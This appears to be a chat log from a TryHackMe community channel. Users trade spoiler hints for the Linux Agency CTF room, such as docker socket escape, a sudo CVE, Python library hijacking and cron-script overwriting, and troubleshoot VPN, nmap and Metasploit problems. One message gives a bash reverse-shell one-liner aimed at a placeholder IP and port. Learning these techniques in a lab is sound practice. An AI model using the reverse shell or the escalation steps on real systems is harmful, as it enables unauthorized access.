But if the net result is a PrivEsc, why should that stop the next step from working 😭
yup
I think it's something to do with env but not going to dig in to it right now
Yea, I think you go a little too long with out a checkpoint in part 4
||You have access to maya's files with it||
It's exhausting to reset the room so often, and losing progress
that's what I thought
||Get to penelope thats a checkout||
It should be a part of the testing process that all rooms are cross checked using the AttackBox too
I ended up just writing down all the commands I used to escalate and then copy pasted them into the cmd once I got in as ||dalia||
I can't even get this Python script executing without errors.
Let me reset and try with a
Anyone got root.txt yet ?|| wondering if its docker escape, route back from docker over ssh or local privesc as maya||
||My money's on docker escape given success.txt||
Any hint on getting maya theres a binary with suid perm,,is it binary exploitation
Same, it should be part of your process to take notes as you go any way . The amount of times I grep through my notes dir when working other boxes
And are you all stabilising shells after each PrivEsc?
Nope, just straight through
^
||Do you have her flag||
Aha. So (a) is working now, and I can finally see the ||shop|| error
||Nope I have penelope||
||Check what you can do with base64||
agree
||Have you got anywhere with root.txt? I tried killing the running docker container, based on the hint I figured you need to boot yourself out, and just got kicked back to maya, can't get back in there||
Just got root.txt
How?
||Hitting the docker socket from within the container ||
can you link a guide? Im not very well versed with ||docker||
@manic citrus any hint on the user.txt ?
||Have you run linpeas.sh?||
Have dm'd you as not sure on rules for links like this in the server
You're fine to link things
Ironically, DMing without prior permission is against the rules
||docker.sock|| ?
lol, my bad on both
||check the sudo -l list||
||What do you mean by hit, I tried sshing, and it doesn't have nc or telnet||
It doesn't give the answer but is the method and should be enough info to get there
||ssh to localhost not 127||
any hint on sean's flag?
||the group he is in allows him to read log files||
@manic citrus thanks bro ❤️
I'm only on THM a short while (60 day streak today since I joined) but this is the wildest room ever
a serious amount of effort went in to creating it
||What do you mean?||
||have you ssh'd as Robert yet?||
||Yes, I'm in there as root||
||docker escape||
and a misconfiguration
||Where I'm at is I've got a running container, however I can't figure out how to hook that up to current session and interact, or run commands remotely||
not got user yet, nevermind root
||Im in docker where do i get this user.txt||
Yea same, I tried socat but it's not working
||once privesc'd in the container from robert to root I copied socat across and then followed that page . I had to change container.json from ubuntu to mangoman ||
||socat is not installed in the container, you need to copy it manually either from the host or from your box ||
||You need to chmod +x and then ./socat instead of socat||
done ./ too but Ill try again
||@verbal flume / @cold bay you also need to modify the mount spec inside the config file to mount / instead of /etc from the host ||
||any hint Im in docker Im seeing /bin/bash but no idea||
this too
is || docker escape|| the only option once I've ||ssh'd as Robert|| ?
||docker in tmp?||
||I'm stuck in robert, what to do next?||
I'm out of my depth right now with Docker, will come back to it in the morning
it's been fun
||i found the docker file and sudo -l, have no idea what to do next||
Thanks, ||I spent quite a bit of time trying to get it to give me a reverse shell, but that didn't seem to work||
Thanks, ||I need to read my linpeas output more closely||
yes you do.
Im trying to escape the docker but curl says couldn't connect to server
Maybe will try socat method
||Am i looking for a CVE to get the user.txt?||
||yes, there is a CVE and it should be reported by linpeas or other privesc scripts||
Anyone kind enough to provide a hint for mission25 for Linux Agency?
Are you already user mission25 trying to get to mission26 ? or are you mission24 trying to get to 25 ?
Did you manage to get the root flag ?
Yea
I'm user mission24 trying to get 25.
||You need to set a new environment variable with the correct value using export variable=value and then execute the binary again . ||
how can you cover the msg like that
use ||
put ||| either side of the text or use the eye icon when you highlight the text
||spoiler||
Thank you! I appreciate the hint.
doing the mr.robot room right now and i got a questions about netcat
when i run it i get a message saying Listening on 0.0.0.0 <port>
but for many writeups people have it as listening on app <port>
is something wrong with my netcat?
I'm stuck trying to get jordan's flag in the Linux Agency room. When I run the script as jordan, it says no module named shop
||take a look at SCENARIO 3 at https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8||
Oh, I appreciate that. Thank you!
||Does the CVE has anything to do with docker.sock?||
||to get the user.txt it is a sudo CVE from 2019 ||
Can't believe I missed that, thanks
No worries, glad I could point you in right direction
Hi all, tearing my hair out here. Exploiting NFS in Network Services 2, and when I run sudo mount -t nfs 10.10.91.213:/home /tmp/mount -nolock I get the error mount.nfs: access denied by server while mounting 10.10.91.213:/home
Please help, wasted the last hour on this with no luck
Please don't ask the same question across multiple channels like that
Are you using a VM?
No problem, but could you please advise the difference between room-hints and room-help? To the unknowing discord user they both seem like the same thing
Yes I'm using a VM
Are you running the VPN in the VM or on the host OS?
I'm running the VPN on the host OS
#room-hints is for hints. #room-help is for help, once you've checked the writeups and are sure you're using the correct method
Oh ok, thanks
All reverse shells, other services too, things break when you run it on the host and NAT stuff
No worries, it would be good for other users to include this info in the https://tryhackme.com/access page
It's in the rooms for configuring your VPN
Fill out the feedback form that's linked in #feedback-and-ideas
Ok so I did a search of "All rooms" for "VPN" and found it, but if I didn't know to search for that I wouldn't have found it. Yep I'll submit the feedback that this room should be linked from https://tryhackme.com/access. Thanks!
!vpn
That fixed it, thanks
Now I'm trying to do nmap, and I've had this issue with nmap for ages..."sudo nmap -sS -p- 10.10.91.213"...this hangs every time, is there anything wrong with it?
Or does it just take a really long time to run?
having issue with linux foundations task 10 "su"..lol, I feel like the answer is in the task but its telling me I'm wrong. Nudge please?
Specifically?
Well the task tells you to use su to change users without logging out and reconnecting, the q is How do you specify which shell is used when you login?, soudl have sworn it would be su
No
It's not
It's asking, for su specifically, what flag you use to specify the shell to use
ah ok ty
a shell is a special binary, like bash or sh, that provides your command line and some more features
Linux agency deserves a badge, awesome room
Awesome indeed, learned a lot.
@native talon glad you enjoyed our room, @minor bough what do you think?
any hint on root.txt in linux agency?
@still fern you cam dm me for hints
@hollow swan Can I dm you ?
@sonic wigeon sure
@hollow swan can I dm about linuxagency?
@white salmon yeah sure
https://tryhackme.com/room/sqlilab i might switch this room because no video walkthrough
By going down the hole. Tell us what you've tried and someone might be able to hint you to the next step.
There's a target
You need to deploy the machine
Then there's a box that gives the ip address
Can't really show you atm, on mobile
So you've deployed the box with the green button? There should be a red bar with 'Active Machine Information' and the target IP below it. Sometimes that doesn't show up and you might just need to refresh or redeploy the box
Ah! Pay up 🤣 🤣
You might have another VM active somewhere?
There's no limit to the number of boxes you can run, but it's one at a time
As a free user
The attack box is limited though
Hey i see that many had the same problem
i'm trying to answer in the room windows event viewer but the answer is wrong (task2) and the number of events increase... anyone can help?
In Linux Agency, is there a connection between the ssh key cracking from the previous task, to get user.txt? I've run linpeas.sh, which shows || docker and a container ip of 172.17.0.2 but I'm getting errors trying to sign in with robert ||
i cant with this room it is impossible to do it
can we ask for hints Room: Linux Agency or not yet ?
Yes you can. Embargo over
Managed to get in, feel closer to user.txt now
I've reached Viktor but looking for hints what to do there
Okay, what have you already tried?
Ive found in || ps aux that diala have a shell but what should I do ||
I'd recommend pinging linpeas.sh over
Have you checked if there are any cronjobs?
I will so
PS - welcome to the crying corner that is the final part of Linux Agency
checked for cron but nothing will run linpeas maybe I am wrong
How do you mean? Once you get it on the machine chmod it
yea I am running it now
but its fun tbh
Got Diala now lets see what to do
Well done buddy
I used AttackBox for this machine. Some advice - whether you stabilise your shells, and or depending on which certain technique you use (will make sense when you do the latter challenges) will depend whether things will work.
I spent 2 days stuck on reza, only to realise it was partly a shell stabilisation issue.
You shouldn't really need it for the next few challenges.
But check the usual things
The room can be talked about now. Right??
Need help with dalia's flag.
I saw the cronjobs but I'm still not able to figure out what to do next. Can anyone help me?
You need to overwrite the script with a reverse shell before it is executed. Unfortunately the script also keeps getting overwritten by another user.
Yeah that's the problem, I tried to overwrite the reverse shell but not working
I took a sledgehammer to it and setup a while true loop with 3s sleep to keep overwriting the file. For the reverse shell I used the bash one from pentest monkeys cheat sheet bash -i >& /dev/tcp/IP-ADDR/PORT 0>&1
Didn't think of this thanks @manic citrus let me try it now.
You could also look at maybe chmod -w which might stop writes to it as well after you have overwritten it
wondering if someone can help me please. I'm using metasploit on "Blue Eternal". I have shell but Ctrl + Z does not work to get out of Windows directory and back to Meterpreter. "bg" or "background" don't work either?
Does nothing happen or does it error?
it suspends it
I kept overwriting it too
rather than going back to Meterpreter
So CTRL+Z usually backgrounds the process
So, if I am not mistaken, it will background the whole of metasploit
yep but when I go back "fg" or "foreground" I just end up back in Windows
Is this the "move that shell" task?
Permission to DM to learn how to hit the || Docker socket || please
Granted
umm no, escalations on Blue
One moment, I can't recall the tasks ๐
means I can't migrate through the process ID's :/
Ah I see, I must have been thinking about the other metasploit room
Thanks Jabba
So have you typed bg when the first shell opens?
C:\Windows\system32>bg
bg
'bg' is not recognized as an internal or external command,
operable program or batch file.
Ah I see the issue
yeah I tried all sorts
Would you be able to screenshot so I know I am right haha
i'm just stuck in the windows shell
I believe you missed a step, the screenshot should hopefully tell me
So it looks like your shell is already stabilised, if I am not mistaken.
Oh it backgrounded all of msfconsole smh
yeah 😦
It's not meant to do that!
James are you able to take over, I need to read my notesss
Thank you Jabba, I really appreciate your help.
I even watched the video btw to make sure
I seem to break things lol
So are you trying to complete the "escalate" task?
^ yes
Okay, I did this room a long time ago so to me I am pretty sure the shell is stabilised.
it does seem to be
I can't, because msf is broke here I think
Jabba, it's a stable shell
It's not a meterpreter
In the top screenshot it is meterpreter, no?

